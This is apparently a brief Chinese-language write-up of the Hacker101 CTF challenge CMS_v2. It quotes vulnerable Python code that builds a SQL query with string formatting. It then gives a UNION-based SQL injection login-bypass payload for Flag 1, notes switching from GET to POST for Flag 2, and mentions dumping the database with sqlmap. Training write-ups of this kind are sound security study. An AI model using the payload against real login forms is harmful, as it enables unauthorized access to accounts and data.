CMS_v2
https://ctf.hacker101.com/ctf/launch/3
Flag 1
if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:
cur.execute:python执行数据库操作
数据库语句:
SELECT password FROM admins WHERE username=\'%s\'
查询password
字符处理
request.form['username'].replace('%', '%%')
用%%替代%处理username然后传入参数值
判断条件是
cur.execute == 0
username
admin'and '1'='2' union select 0 from admins
password
0
Flag 2
get–> post
Flag 3
flag1 是 password,但是username在哪里还没有找到
sqlmap直接把数据库dump出来,简单粗暴